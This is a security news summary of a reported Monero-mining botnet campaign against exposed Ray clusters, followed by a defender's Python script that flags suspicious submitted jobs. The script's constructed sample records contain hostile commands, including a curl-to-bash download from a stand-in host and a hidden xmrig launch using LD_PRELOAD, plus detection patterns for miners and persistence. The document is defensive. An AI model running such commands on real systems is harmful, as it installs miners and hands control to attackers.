Overview
- Oligo reports a renewed campaign converting publicly reachable Ray clusters into a self-propagating Monero-mining botnet, with the latest delivery wave operating from GitHub since November 17.
- An earlier phase using GitLab was disrupted on November 5 after takedowns, and GitHub said it removed violating accounts as attackers repeatedly spun up new repositories.
- Access is gained through the Ray Job Submission API and abuse of the framework’s own scheduling to deploy malware across nodes and between clusters, with large-scale target discovery observed via interact.sh callbacks.
- Payloads appear LLM-generated and install XMRig configured to cap CPU use at about 60%, hide GPU activity, persist via cron and systemd, disguise processes, and kill competing miners.
- Beyond cryptomining, the operation enables reverse shells for interactive control, data theft and lateral movement, and can launch DDoS attacks, all against a large attack surface of more than 200,000 exposed Ray servers.
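As an added example (not from Oligo's report or the Ray project), a small audit script a defender can run against their own Ray head node: it pulls the job list from the Job Submission API and flags entrypoints whose traits match the behaviour described above (piped remote scripts, miner binaries, cron/systemd persistence, process hiding). It assumes the Ray Jobs REST endpoint `/api/jobs/` and the `entrypoint`, `submission_id` and `runtime_env.env_vars` fields; the sample job records are constructed.

```python
import re
import json
import urllib.request

# Constructed sample of what GET /api/jobs/ on a Ray head node returns, trimmed
# to the fields used here (field names follow the Ray Jobs REST API).
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_ok1", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 10", "runtime_env": {}},
    {"submission_id": "raysubmit_sus1", "status": "RUNNING",
     "entrypoint": "curl -fsSL http://203.0.113.10/setup.sh | bash",
     "runtime_env": {}},
    {"submission_id": "raysubmit_sus2", "status": "RUNNING",
     "entrypoint": "python -c \"import os;os.system('nohup /tmp/.cache/xmrig &')\"",
     "runtime_env": {"env_vars": {"LD_PRELOAD": "/tmp/.cache/hide.so"}}},
]

# Traits unusual for a legitimate ML job entrypoint but typical of the campaign
# (remote script piping, miner binaries, persistence, hidden temp dirs).
# Tune the list for your own workloads.
SUSPICIOUS = [
    (re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh"), "pipes a downloaded script into a shell"),
    (re.compile(r"\bxmrig\b|minerd|stratum\+tcp", re.I), "references a miner binary or pool"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes an inline base64 payload"),
    (re.compile(r"\bcrontab\b|systemctl\s+(enable|start)"), "sets up cron/systemd persistence"),
    (re.compile(r"/tmp/\.|/dev/shm/"), "runs from a hidden temp directory"),
]

def flag_job(job: dict) -> list:
    """Return human-readable reasons a submitted job looks like a miner deployment."""
    reasons = []
    text = job.get("entrypoint", "")
    for pattern, why in SUSPICIOUS:
        if pattern.search(text):
            reasons.append(why)
    env = job.get("runtime_env") or {}
    if "LD_PRELOAD" in (env.get("env_vars") or {}):
        reasons.append("sets LD_PRELOAD via runtime_env (process hiding)")
    return reasons

def flag_suspicious_jobs(jobs: list) -> dict:
    """Map submission_id -> reasons for every job that trips at least one check."""
    return {j["submission_id"]: r for j in jobs if (r := flag_job(j))}

def fetch_jobs(head_url: str) -> list:
    """Pull the job list from a head node you own. No credentials are sent: if this
    succeeds from outside your network, the API is exposed as the campaign relies on."""
    with urllib.request.urlopen(f"{head_url.rstrip('/')}/api/jobs/", timeout=5) as resp:
        return json.load(resp)
```

Run `flag_suspicious_jobs(fetch_jobs("http://<head-node>:8265"))` against your own cluster; an empty result only means the current job list is clean, not that the dashboard port should stay reachable without authentication.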